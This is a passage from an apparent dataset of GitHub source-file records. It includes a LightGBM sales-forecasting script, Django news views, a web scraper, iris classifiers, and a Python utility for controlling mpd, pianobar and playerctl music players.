['event_name_cultural', 'event_name_sporting', 
'event_name_national', 'event_name_religious']\n cat_feats = [x for x in cat_feats if x not in parameters['remove_features']]\n\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n\n print(f'Models are divided by {by_variable}')\n values = list(encoder.mapping[by_variable].keys())\n print(values)\n\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n i = 1\n for month in months:\n fcst_date = 1914 - 28 * month\n for value in values:\n print(f'Step {i} out of {len(values) * len(months)}')\n print(by_variable, ':', value)\n value_filter = {by_variable : value}\n \n ### load abt\n abtname = f'abt_recursive_{fcst_date}_{history_length}_{value}.pkl'\n if abtname not in os.listdir('./work'):\n # if abt is not in work - create new and save\n abt = create_abt_recursive(value_filter=value_filter, fcst_date=fcst_date, history_length=history_length, n_batches=100)\n abt.to_pickle(f'./work/{abtname}')\n else:\n # otherwise - load pickle\n abt = pd.read_pickle(f'./work/{abtname}')\n \n # abt.drop('id', axis=1, inplace=True)\n abt.drop(parameters['remove_features'], axis=1, inplace=True)\n abt = abt[abt['history_length'] >= history_start]\n \n# for feature in cat_feats:\n# abt[feature] = abt[feature].astype('category')\n \n # 3. separate into train and test\n y_train = abt.loc[abt['day'] < fcst_date, 'sales']\n X = abt.drop(['sales'], axis=1)\n X_train = X[X['day'] < fcst_date]\n # X_test = X[X['day'] >= fcst_date]\n\n # 4. convert to lgbm dataset\n print(f'Train data shape: {X_train.shape}')\n train_data = lgb.Dataset(X_train, label = y_train, categorical_feature=cat_feats, free_raw_data=True)\n val_data = lgb.Dataset(X_train.iloc[:1000], label = y_train[:1000], categorical_feature=cat_feats, free_raw_data=True)\n X_train = None\n # 5. train\n model = lgb.train(parameters['lgbm_params'], train_data, valid_sets = [val_data], verbose_eval=20)\n\n # 6. 
save model\n name = f'{model_id}_{month}_{value}'\n model.save_model(\"./work/\" + name + \".lgb\")\n i += 1\n print('Model training complete')\n pass\n\n\ndef update_features(abt, fcst_day):\n idx = (abt['day'] == fcst_day)\n ### columns to update\n ## lags\n for lag in [int(x[3:]) for x in abt.columns if x.startswith('lag')]:\n # new _values\n lag_col = abt.loc[abt['day'] == (fcst_day - lag), 'sales'].values\n # old values\n abt.loc[idx, f'lag{lag}'] = lag_col\n\n ## sales mean\n # for period in [7, 28, 364]:\n # # update mean as += lag1 / period\n # # old values\n # old_values = abt.loc[idx, f'sales_mean_{period}'].values\n # delta_values = abt.loc[idx, 'lag1'].values / period\n # new_values = old_values + delta_values\n # # update\n # abt.loc[abt['day'] == fcst_day, f'sales_mean_{period}'] = new_values\n\n # sales median and rstd and mean\n for period in [7, 28, 364]:\n day_range = range(fcst_day - period, fcst_day)\n # take last {period} values\n tmp = abt.loc[abt['day'].isin(day_range), ['sales', 'id', 'day']]\n # convert to pivot\n tmp = tmp.pivot(index='id', columns='day',values='sales')\n\n mean = tmp.mean(axis=1).values\n abt.loc[idx, f'sales_mean_{period}'] = mean\n if period != 7:\n # recalculate median and rstd\n median = tmp.median(axis=1).values\n rstd = tmp.std(axis=1).values / tmp.mean(axis=1).values\n # update\n abt.loc[idx, f'sales_median_{period}'] = median\n abt.loc[idx, f'sales_rstd_{period}'] = rstd\n\n # sales ratio\n abt.loc[idx, 'sales_ratio_mean7_to_mean28'] = abt.loc[idx, 'sales_mean_7'] / abt.loc[idx, 'sales_mean_28']\n abt.loc[idx, 'sales_ratio_mean7_to_mean364'] = abt.loc[idx, 'sales_mean_7'] / abt.loc[idx, 'sales_mean_364']\n abt.loc[idx, 'sales_ratio_mean28_to_mean364'] = abt.loc[idx, 'sales_mean_28'] / abt.loc[idx, 'sales_mean_364']\n return abt\n\n\ndef get_prediction_recursive(abt, m, model_id, fcst_date = 1914):\n abt = abt[abt['day'] >= fcst_date - 364]\n parameters = get_model_parameters(model_id)\n prediction = pd.DataFrame({})\n for fcst_day in tqdm(range(fcst_date, fcst_date + 28)):\n idx = (abt['day'] == fcst_day)\n # get forecast for next day\n dX = abt.loc[idx, :].drop(['sales'] + parameters['remove_features'], axis=1)\n pred = m.predict(dX)\n # write false history back to abt\n abt.loc[idx, 'sales'] = pred\n # save prediction\n d_pred = abt.loc[idx, ['id', 'sales']].rename(columns={'sales' : fcst_day}).set_index('id')\n if prediction.empty:\n prediction = d_pred\n else:\n prediction = prediction.join(d_pred, on='id')\n # update features\n if fcst_day != fcst_date + 28 - 1:\n abt = update_features(abt, fcst_day = fcst_day + 1)\n return prediction\n\n\n\ndef predict_and_prepare_submit_recursive(model_id, month):\n ### get prediction\n parameters = get_model_parameters(model_id)\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n fcst_date = 1914 - 28 * month\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n values = list(encoder.mapping[by_variable].keys())\n\n prediction = []\n for value in values:\n print(f'Preparing prediction for {value}')\n abt = pd.read_pickle(f'./work/abt_recursive_{fcst_date}_{history_length}_{value}.pkl')\n abt.sort_values(['id', 'day'], inplace=True)\n m = lgb.Booster(model_file=f'./work/{model_id}_{month}_{value}.lgb')\n prediction.append(get_prediction_recursive(abt, m, model_id, fcst_date = fcst_date))\n\n prediction = pd.concat(prediction)\n 
prediction.to_csv(\"./fin_submission/final_prediction.csv\")\n ### submit prediction\n prediction.columns = [f\"F{x+1-fcst_date}\" for x in prediction.columns]\n prediction.reset_index(inplace=True)\n prediction['id'] = encoder.decode(prediction, 'id')\n prediction.set_index('id', inplace=True)\n\n example = pd.read_csv('./data/sample_submission.csv')\n submission = example[['id']].join(prediction, on='id')\n prediction.reset_index(inplace=True)\n prediction['id'] = prediction['id'].str[:-len(\"validation\")] + \"evaluation\"\n # prediction.set_index('id', inplace=True)\n submission = pd.concat([submission, prediction])\n submission.to_csv(f'./fin_submission/{model_id}.csv', index=False)\n pass\n" } ]
5
nw371/NP51
https://github.com/nw371/NP51
8e44bcb96eed820faaeb11c08acf6b0575869121
c2f7c7da241663b5f33e4f6d23978b7f10cf9c01
54c13bd964b81bc8d0dc955aa9601a6cdd7616c6
refs/heads/master
2023-07-24T00:51:11.221923
2021-09-07T21:34:37
2021-09-07T21:34:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7227404117584229, "alphanum_fraction": 0.7237053513526917, "avg_line_length": 48.31745910644531, "blob_id": "5cd56c004ce440ce5892fd47f97d654b00d214d2", "content_id": "e472e6497777286ae6e1d4c88237bc3788e5a72b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4158, "license_type": "no_license", "max_line_length": 180, "num_lines": 63, "path": "/news/views.py", "repo_name": "nw371/NP51", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import ListView, DetailView, TemplateView, FormView, UpdateView, DeleteView\nfrom .forms import PostForm\nfrom .filters import PostFilter\nfrom .models import Post\n\nclass News(ListView):\n model = Post # указываем модель, объекты которой мы будем выводить\n template_name = 'news.html' # указываем имя шаблона, в котором будет лежать HTML, в котором будут все инструкции о том, как именно пользователю должны вывестись наши объекты\n context_object_name = 'news' # это имя списка, в котором будут лежать все объекты, его надо указать, чтобы обратиться к самому списку объектов через HTML-шаблон\n queryset = Post.objects.order_by('-date')\n paginate_by = 10\n\nclass SearchNews(ListView):\n model = Post # указываем модель, объекты которой мы будем выводить\n template_name = 'search.html' # указываем имя шаблона, в котором будет лежать HTML, в котором будут все инструкции о том, как именно пользователю должны вывестись наши объекты\n context_object_name = 'search' # это имя списка, в котором будут лежать все объекты, его надо указать, чтобы обратиться к самому списку объектов через HTML-шаблон\n queryset = Post.objects.order_by('-date')\n paginate_by = 5\n\n def get_context_data(self, **kwargs): # забираем отфильтрованные объекты переопределяя метод get_context_data у наследуемого класса (привет, полиморфизм, мы скучали!!!)\n context = super().get_context_data(**kwargs)\n context['filter'] = PostFilter(self.request.GET, queryset=self.get_queryset()) # вписываем наш фильтр в контекст\n return context\n\n# создаём представление, в котором будут детали конкретного отдельного товара\nclass PostDetail(DetailView):\n model = Post # модель всё та же, но мы хотим получать детали конкретно отдельного товара\n template_name = 'post.html' # название шаблона будет product.html\n context_object_name = 'post' # название объекта. в нём будет\n\nclass AddPub(FormView):\n model = Post\n template_name = 'add.html'\n context_object_name = 'add'\n form_class = PostForm\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST) # создаём новую форму, забиваем в неё данные из POST-запроса\n\n if form.is_valid(): # если пользователь ввёл всё правильно и нигде не ошибся, то сохраняем новый товар\n form.save()\n\n return super().get(request, *args, **kwargs)\n\nclass PostEdit(LoginRequiredMixin, UpdateView):\n #model = Post # модель всё та же, но мы хотим получать детали конкретно отдельного товара\n template_name = 'edit.html' # название шаблона будет product.html\n #context_object_name = 'post' # название объекта. в нём будет\n form_class = PostForm\n\n def get_object(self, **kwargs):\n id = self.kwargs.get('pk')\n return Post.objects.get(pk=id)\n\nclass PostDelete(DeleteView):\n\n template_name = 'delete.html' # название шаблона будет product.html\n queryset = Post.objects.all()\n success_url = '/news/'\n\nclass LoginPage(TemplateView):\n template_name = 'login.html'\n\n\n" } ]
1
andreastsimerikas/scraper
https://github.com/andreastsimerikas/scraper
d7b25c68ee60a54bef6496190255b900e0b508c6
c8f230acbcfbf90d7e19984171cdd111888d54f8
48fe4de27bce492c2a9a27a330290a8b4eaba1ae
refs/heads/main
2023-08-27T00:52:33.765392
2021-11-07T09:34:05
2021-11-07T09:34:05
424,673,828
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6367521286010742, "alphanum_fraction": 0.6524216532707214, "avg_line_length": 25.80769157409668, "blob_id": "f686494b8b222cd0e21bdbdf1f7c70cdc11cddc0", "content_id": "6ac8bd679a930c3d63d7046983173fd0c54aae1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 110, "num_lines": 26, "path": "/main.py", "repo_name": "andreastsimerikas/scraper", "src_encoding": "UTF-8", "text": "from time import sleep\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\n\nphones = []\n\nfor page in range(5):\n try:\n page = requests.get(\"https://www.skroutz.gr/c/40/kinhta-thlefwna/m/15053/Xiaomi.html?page=\"+str(page))\n soup = BeautifulSoup(page.text, \"html.parser\")\n except requests.exceptions.RequestException as error:\n print(error)\n\n\n phone_data = soup.findAll('li', attrs= {'class': \"cf card with-skus-slider\"})\n\n for data in phone_data:\n phones.append(data.find(\"div\", class_ = \"card-content\").h2.a.text) \n\n print(phones) \n sleep(5)\n \nphones_df = pd.DataFrame({\"Phone\": phones}) \nprint(phones_df)\n\n\n\n\n\n" } ]
1
Alunkar/Machine-Learning-Projects
https://github.com/Alunkar/Machine-Learning-Projects
51f3e344c90a7dc93c82573fd1b46920276cf22e
b0051f0e673bd02a36d815b6de52e9c2a15d825e
0c9f0d285cfba654a5b396e88491015f724369fe
refs/heads/master
2021-01-02T17:05:02.062183
2020-02-11T12:03:43
2020-02-11T12:03:43
239,711,645
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6836646795272827, "alphanum_fraction": 0.7009507417678833, "avg_line_length": 21.8125, "blob_id": "8183a48d59bae72fd0fc34efc23f21cb07ee72f4", "content_id": "bc83fbf90a9ffb113835348861d83b70ba48f333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 147, "num_lines": 48, "path": "/Iris Species classification using Decision tree algorithm.py", "repo_name": "Alunkar/Machine-Learning-Projects", "src_encoding": "UTF-8", "text": "import numpy as np;\r\nfrom sklearn import tree;\r\nfrom sklearn.datasets import load_iris;\r\n\r\n\r\niris = load_iris();\r\n\r\nprint(\"Features :\");\r\nprint(iris.feature_names);\r\n\r\nprint(\"Target :\");\r\nprint(iris.target_names);\r\n\r\ntest_index = [1,51,101];\r\n\r\n#TRAIN\r\ntrain_target = np.delete(iris.target,test_index); #train_target has 147x1 targets\r\ntrain_data = np.delete(iris.data,test_index,axis=0);#train_data has data of 147x4 flowers \r\n\r\n#TEST\r\ntest_target = iris.target[test_index];#test_target has 3x1 targets\r\ntest_data = iris.data[test_index];#test_data has 3x4 data\r\n\r\n#decide Algo\r\nclf = tree.DecisionTreeClassifier();\r\n\r\n#train Data\r\nclf.fit(train_data,train_target);\r\n\r\n\r\nprint(\"values for testing\");\r\nprint(test_target);\r\n\r\n#test DATA\r\nrslt = clf.predict(test_data);\r\n\r\nprint(\"After testing: \",rslt);\r\n\r\n\r\n#Visuals\r\nfrom sklearn.externals.six import StringIO;\r\nimport pydot;\r\n\r\ndot_data = StringIO();\r\n\r\ntree.export_graphviz(clf,out_file=dot_data,feature_names=iris.feature_names,class_names=iris.target_names,filled=True,rounded=True,impurity=False);\r\ngraph = pydot.graph_from_dot_data(dot_data.getvalue());\r\ngraph[0].write_pdf(\"ML.pdf\");\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6495685577392578, "alphanum_fraction": 0.6572387218475342, "avg_line_length": 23.463415145874023, "blob_id": "fd75c15dca85b7be2dff114853913a36db295272", "content_id": "137ebe0b37523d64861ac00514e14a1129efcf71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 96, "num_lines": 82, "path": "/Iris Species classification using KNN algorithm.py", "repo_name": "Alunkar/Machine-Learning-Projects", "src_encoding": "UTF-8", "text": "from sklearn import tree\r\nfrom scipy.spatial import distance\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nclass MyKNN():\r\n\tdef fit(self,TrainingData, TrainingTarget):\r\n\t\tself.TrainingData = TrainingData;\r\n\t\tself.TrainingTarget = TrainingTarget;\r\n\r\n\tdef predict(self,TestData):\r\n\t\tpredictions = [];\r\n\t\tfor eachrow in TestData:\r\n\t\t\tlabel = self.closest(eachrow);\r\n\t\t\tpredictions.append(label);\r\n\t\treturn predictions;\r\n\r\n\tdef closest(self,eachrow):\r\n\t\tbestdistance = euc(eachrow,self.TrainingData[0]);\r\n\t\tbestindex = 0;\r\n\r\n\t\tfor i in range(1, len(self.TrainingData)):\r\n\t\t\tdist = euc(eachrow,self.TrainingData[i]);\r\n\r\n\t\t\tif dist < bestdistance:\r\n\t\t\t\tbestdistance = dist;\r\n\t\t\t\tbestindex = i;\r\n\t\treturn self.TrainingTarget[bestindex];\r\n\r\ndef euc(a,b):\r\n\treturn distance.euclidean(a,b);\r\n\r\ndef MyKNeighbor():\r\n\tborder = '-'*60;\r\n\r\n\tiris = load_iris();\r\n\r\n\tdata = iris.data;\r\n\ttarget = 
iris.target;\r\n\r\n\tprint(border);\r\n\tprint(\"Actual Dataset\");\r\n\tprint(border);\r\n\r\n\tfor i in range(len(iris.target)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i,iris.data[i],iris.target[i]));\r\n\tprint(\"Size of Dataset: %d\" %(i+1))\r\n\r\n\tdata_train, data_test, target_train, target_test = train_test_split(data,target,test_size=0.35)\r\n\r\n\tprint(border);\r\n\tprint(\"Training Dataset\");\r\n\tprint(border);\r\n\tfor i in range(len(data_train)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i+1,data_train[i],target_train[i]));\r\n\tprint(\"Size of Training Dataset: %d\" %(i+1))\r\n\t\r\n\t\r\n\tprint(border);\r\n\tprint(\"Testing Dataset\");\r\n\tprint(border);\r\n\tfor i in range(len(data_test)):\r\n\t\tprint(\"ID: %d\t\tLabel: %s\t\tFeature: %s\" %(i+1,data_test[i],target_test[i]));\r\n\tprint(\"Size of Training Dataset: %d\" %(i+1))\r\n\tprint(border);\r\n\r\n\r\n\tclf = MyKNN();\r\n\tclf.fit(data_train,target_train);\r\n\tpredictions = clf.predict(data_test);\r\n\tAccuracy = accuracy_score(target_test,predictions);\r\n\r\n\treturn Accuracy;\r\n\r\ndef main():\r\n\r\n\tAccuracy = MyKNeighbor();\r\n\tprint('Accuracy with KNN is: ',(Accuracy*100),'%');\r\n\r\nif __name__ == \"__main__\":\r\n\tmain();" } ]
2
PTNobel/musicctl
https://github.com/PTNobel/musicctl
6eccdcf3c5326d5f97b0b058e516cd5e9049a8a7
c311d025176564dc1ed09d5143519bbdf1b0f2a5
f7797b3a1d7cea51c8fe71c66844240856bc54b9
refs/heads/master
2021-04-29T10:54:35.581057
2017-01-02T20:50:05
2017-01-02T20:50:05
77,860,724
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039227247238159, "alphanum_fraction": 0.6048009395599365, "avg_line_length": 27.46666717529297, "blob_id": "2b5e621dccbcc419e91d11aaadb14a69ae2ceea0", "content_id": "bba707ebfb9e61c8a6bee7303de57eb30cb54bee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3416, "license_type": "permissive", "max_line_length": 78, "num_lines": 120, "path": "/process.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom os import listdir as _listdir\nfrom os.path import join as _join\nfrom typing import List, Dict\n\n\n__all__ = [\n \"is_comm_running\",\n \"get_comms_to_pids\",\n \"get_pids_to_comms\",\n \"get_pids_to_cmdlines\",\n \"get_pids_of_comm\",\n \"get_comm_of_pid\",\n \"get_pids\",\n \"get_comms\",\n \"get_pids_of_comm\",\n \"update_buffers\",\n \"get_cmdline_of_pid\",\n]\n\n_buffer_map_pids_to_comms = {} # type: Dict[str, str]\n_buffer_map_pids_to_cmdlines = {} # type: Dict[str, List[str]]\n_buffer_map_comms_to_pids = {} # type: Dict[str, List[str]]\n_buffer_running_pids = [] # type: List[str]\n_buffer_list_of_comms = [] # type: List[str]\n\n\ndef _build_buffers() -> None:\n global _buffer_map_pids_to_comms\n global _buffer_map_pids_to_cmdlines\n global _buffer_running_pids\n global _buffer_list_of_comms\n global _buffer_map_comms_to_pids\n global _buffer_map_comms_to_pids\n\n _buffer_map_pids_to_comms = {} # Dict[str, str]\n _buffer_map_pids_to_cmdlines = {} # Dict[str, List[str]]\n _buffer_running_pids = [pid for pid in _listdir('/proc') if pid.isdigit()]\n _buffer_list_of_comms = [] # List[str]\n _buffer_map_comms_to_pids = {} # type: Dict[str, List[str]]\n\n for index, pid in enumerate(_buffer_running_pids):\n try:\n comm_file = open(_join('/proc', pid, 'comm'), 'r')\n comm = comm_file.read().rstrip('\\n')\n comm_file.close()\n _buffer_map_pids_to_comms[pid] = comm\n\n cmd_file = open(_join('/proc', pid, 'cmdline'), 'r')\n cmd = cmd_file.read().rstrip('\\n')\n cmd_file.close()\n cmdline = cmd.split('\\x00')\n\n _buffer_map_pids_to_cmdlines[pid] = cmdline\n\n if comm not in _buffer_list_of_comms:\n _buffer_list_of_comms.append(comm)\n _buffer_map_comms_to_pids[comm] = list()\n\n _buffer_map_comms_to_pids[comm].append(pid)\n\n except FileNotFoundError:\n _buffer_running_pids.pop(index)\n\n\ndef update_buffers() -> None:\n _build_buffers()\n\n\ndef get_pids() -> List[str]:\n \"\"\"Returns a list of pids\"\"\"\n return _buffer_running_pids\n\n\ndef get_comms() -> List[str]:\n \"\"\"Returns a list of comms\"\"\"\n return _buffer_list_of_comms\n\n\ndef get_comms_to_pids() -> Dict[str, List[str]]:\n \"\"\"Returns a dict of comms as keys and a list of pids as values\"\"\"\n return _buffer_map_comms_to_pids\n\n\ndef get_pids_to_comms() -> Dict[str, str]:\n \"\"\"Returns a dict of pids as keys and a string of the comm as values\"\"\"\n return _buffer_map_pids_to_comms\n\n\ndef get_pids_of_comm(comm: str) -> List[str]:\n \"\"\"Returns a list of all pids with comm\"\"\"\n try:\n pids = _buffer_map_comms_to_pids[comm]\n except KeyError:\n pids = []\n return pids\n\n\ndef get_pids_to_cmdlines() -> Dict[str, List[str]]:\n \"\"\"Returns a dict of pids as keys and a string of the comm as values\"\"\"\n return _buffer_map_pids_to_cmdlines\n\n\ndef get_comm_of_pid(pid: str) -> str:\n \"\"\"Returns the str of the comm of a pid\"\"\"\n return _buffer_map_pids_to_comms[pid]\n\n\ndef get_cmdline_of_pid(pid: str) -> List[str]:\n \"\"\"Returns the list with each argv entry of pid as a 
different string\"\"\"\n return _buffer_map_pids_to_cmdlines[pid]\n\n\ndef is_comm_running(comm: str) -> bool:\n \"\"\"Returns a bool if any process with that comm is running\"\"\"\n return comm in _buffer_list_of_comms\n\n\n_build_buffers()\n" }, { "alpha_fraction": 0.5380741357803345, "alphanum_fraction": 0.5426522493362427, "avg_line_length": 25.003969192504883, "blob_id": "2fc7d281e89001e93631130f50d65e3a0673d146", "content_id": "ee2e4f3bb64ab994c78bb6465ce8c4ca5d85cfc0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6553, "license_type": "permissive", "max_line_length": 77, "num_lines": 252, "path": "/player.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# A python3 port of musicctl.sh.\n\nimport time\nimport os\nimport sys\nimport re\nimport subprocess\nimport process\n\n\n# warning() functions like print, except it prefixes everything and prints to\n# stderr.\ndef warning(*objs, prefix='WARNING: '):\n printed_list = str(prefix)\n for i in objs:\n printed_list += str(i)\n print(printed_list, file=sys.stderr)\n\n\ndef get_keys(list_of_classes):\n for i in list_of_classes:\n print(\"For player \" + str(i) +\n \" the following commands are available:\")\n for j in sorted(i.commands.keys()):\n print(\" \" + j)\n\n exit(0)\n\n\nclass mpd:\n __name__ = 'mpd'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.back, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def _call_mpc(self, *option):\n devnull = open('/dev/null')\n subprocess.call(['mpc', *option], stdout=devnull.buffer)\n devnull.close()\n\n def __repr__(self):\n return self.__name__\n\n def pause(self):\n self._call_mpc('toggle')\n\n def back(self):\n self._call_mpc('prev')\n\n def next(self):\n self._call_mpc('next')\n\n def stop(self):\n self._call_mpc('stop')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n try:\n is_playing_present = b\"playing\" in subprocess.check_output(\n ['mpc', 'status'])\n except subprocess.CalledProcessError:\n is_playing_present = False\n return is_playing_present\n\n\n# Since the easiest way to control mopidy is through its mpd implementation,\n# the mopidy class inherets its implementation from the mpd class.\nclass mopidy(mpd):\n __name__ = 'mopidy'\n\n\nclass pianobar:\n __name__ = 'pianobar'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.like, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'tired': self.tired, 'like': self.like,\n 'dislike': self.dislike,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def __repr__(self):\n return self.__name__\n\n def _call_pianoctl(self, option):\n subprocess.call(\n ['pianoctl', option])\n\n def pause(self):\n self._call_pianoctl('p')\n\n def like(self):\n self._call_pianoctl('+')\n\n def dislike(self):\n self._call_pianoctl('-')\n\n def next(self):\n self._call_pianoctl('n')\n\n def stop(self):\n self._call_pianoctl('q')\n # if pianobar isn't responding kill it.\n time.sleep(1)\n process.update_buffers()\n if process.is_comm_running(\"pianobar\"):\n subprocess.call(['kill'] + process.get_pids_of_comm('pianobar'))\n\n def tired(self):\n self._call_pianoctl('t')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n log1_time_stamp, 
success1 = self._get_time()\n time.sleep(2)\n log2_time_stamp, success2 = self._get_time()\n\n if not (success1 and success2):\n output = False\n if log1_time_stamp == log2_time_stamp:\n output = False\n else:\n output = True\n return output\n\n def _get_time(self, tries=0):\n \"\"\"Reads the pianobar time, and returns a tuple of str '##:##/##:##'\n and a boolean which reflects whether it matches the regex\"\"\"\n log = open(os.path.expanduser('~/.config/pianobar/out'), 'r')\n time_stamp = log.read()[-12:-1]\n log.close()\n if re.match(r'^\\d{2}:\\d{2}/\\d{2}:\\d{2}$', time_stamp):\n return (time_stamp, True)\n elif tries < 3:\n time.sleep(1)\n return self._get_time(tries+1)\n else:\n return (time_stamp, False)\n\n\nclass playerctl:\n __name__ = 'playerctl'\n\n def __init__(self):\n self.commands = {'play': self.pause, 'pause': self.pause,\n 'back': self.back, 'next': self.next,\n 'quit': self.stop, 'stop': self.stop,\n 'is_playing': self.is_playing_shell_wrapper}\n\n def __repr__(self):\n return self.__name__\n\n def _call_playerctl(self, option):\n subprocess.call(\n ['playerctl', option])\n\n def pause(self):\n self._call_playerctl('play-pause')\n\n def back(self):\n self._call_playerctl('previous')\n\n def next(self):\n self._call_playerctl('next')\n\n def stop(self):\n self._call_playerctl('stop')\n\n def is_playing_shell_wrapper(self):\n if self.is_playing():\n exit(0)\n else:\n exit(1)\n\n def is_playing(self):\n try:\n is_playing_present = b\"Playing\" in subprocess.check_output(\n ['playerctl', 'status'])\n except subprocess.CalledProcessError:\n is_playing_present = False\n return is_playing_present\n\n\ndef current_player():\n list_of_process_names = process.get_comms()\n\n # pianobar get priority over mpd, unless mpd is playing.\n if 'mpd' in list_of_process_names:\n if 'pianobar' in list_of_process_names:\n if b'playing' in subprocess.check_output(['mpc', 'status']):\n output = mpd()\n else:\n output = pianobar()\n else:\n output = mpd()\n elif 'pianobar' in list_of_process_names:\n output = pianobar()\n elif 'mopidy' in list_of_process_names:\n output = mopidy()\n else:\n output = playerctl()\n\n return output\n\n\ndef is_playing():\n return current_player().is_playing()\n\n\ndef pause():\n current_player().commands['pause']()\n\n\ndef stop():\n current_player().commands['stop']()\n\n\ndef back():\n current_player().commands['back']()\n\n\ndef next_song():\n current_player().commands['next']()\n\n\ndef print_keys(list_of_classes=[mopidy, mpd, pianobar, playerctl]):\n for i in list_of_classes:\n player = i()\n print(\"For player \" + player.__repr__() +\n \" the following commands are available:\")\n for j in sorted(player.commands.keys()):\n print(\" \" + j)\n\n\nif __name__ == '__main__':\n print('Please don\\'t do this.')\n" }, { "alpha_fraction": 0.5178614854812622, "alphanum_fraction": 0.5249088406562805, "avg_line_length": 28.39285659790039, "blob_id": "95120954e332e2269d73160583ee2d15d0dd09d2", "content_id": "ec23728746ad38ae24f497ddf1393830ac680969", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 79, "num_lines": 140, "path": "/musicctl.py", "repo_name": "PTNobel/musicctl", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\n# A python3 port of musicctl.sh.\n\nimport os\nimport sys\nimport player\n\n\n# warning() functions like print, except it prefixes everything and prints to\n# stderr.\ndef warning(*objs, prefix='WARNING: '):\n printed_list = 
str(prefix)\n for i in objs:\n printed_list += str(i)\n print(printed_list, file=sys.stderr)\n\n\ndef usage(exit_code, name):\n usage_text = \"Usage: %s {[a command]|player|commands|usage|help}\" % name\n\n if exit_code == 0:\n print(usage_text)\n elif exit_code > 0:\n warning(usage_text, prefix='')\n elif exit_code < 0:\n usage(exit_code, name)\n exit(exit_code)\n\n\ndef processargs(input_argv):\n\n # All of these run in the same scope as processargs(). They make changes to\n # output.\n def _help():\n usage(0, output['name'])\n\n def _trial():\n output[\"test_mode_prefix\"] = 'echo '\n output[\"test_mode_suffix\"] = ''\n\n def _player():\n if '=' in input_argv[i]:\n player = input_argv[i].split('=')[1]\n else:\n player = input_argv[i + 1]\n indexes_to_ignore.append(i + 1)\n try:\n output[\"player\"] = {\n 'mpd': player.mpd,\n 'mpc': player.mpd,\n 'pianobar': player.pianobar,\n 'pianoctl': player.pianobar,\n 'playerctl': player.playerctl,\n 'mpris': player.playerctl,\n }[player]()\n except KeyError:\n warning('Invalid player')\n exit(1)\n\n # In place of a switch-case statement the following dictionaires link argv\n # entries to functions.\n long_args_to_disc = {'--help': _help,\n '--trial': _trial, '--player': _player}\n short_args_to_disc = {'h': _help, 't': _trial, 'p': _player}\n output = {\"input\": None,\n \"test_mode_prefix\": '',\n \"test_mode_suffix\": ' >/dev/null',\n \"name\": os.path.basename(input_argv[0]),\n \"player\": None,\n }\n indexes_to_ignore = list()\n\n if len(input_argv) == 1:\n warning(\"Not enough arguments\")\n usage(1, output['name'])\n else:\n # range() starts at 1 to prevent the name from being processed.\n for i in range(1, len(input_argv)):\n if i in indexes_to_ignore:\n continue\n\n elif len(input_argv[i]) >= 2 and input_argv[i][0:2] == '--':\n try:\n long_args_to_disc[input_argv[i].split('=')[0]]()\n except KeyError:\n warning(\"Invalid argument\", prefix='')\n usage(1, output['name'])\n\n elif input_argv[i][0] == '-' and input_argv[i][1] != '-':\n for j in range(1, len(input_argv[i])):\n try:\n short_args_to_disc[input_argv[i][j]]()\n except KeyError:\n warning(\"Invalid argument\", prefix='')\n usage(1, output['name'])\n\n elif output[\"input\"] is None:\n output[\"input\"] = input_argv[i]\n\n else:\n warning(\"Error parsing arguments\")\n usage(1, output['name'])\n\n return output\n\n\n# global arguments\narguments = processargs(sys.argv)\n\n\ndef main(arguments):\n # Handle help and usage correctly:\n if arguments[\"input\"] == \"usage\" or arguments[\"input\"] == \"help\":\n usage(0, arguments['name'])\n\n if arguments[\"input\"] == \"commands\":\n player.print_keys()\n exit(0)\n\n # Figure out what player is running.\n if arguments['player'] is not None:\n current_player = arguments['player']\n else:\n current_player = player.current_player()\n if arguments[\"input\"] == \"player\":\n print(current_player)\n exit(0)\n\n # Catching a KeyError should prevent this from exploding over the user\n # giving invalid 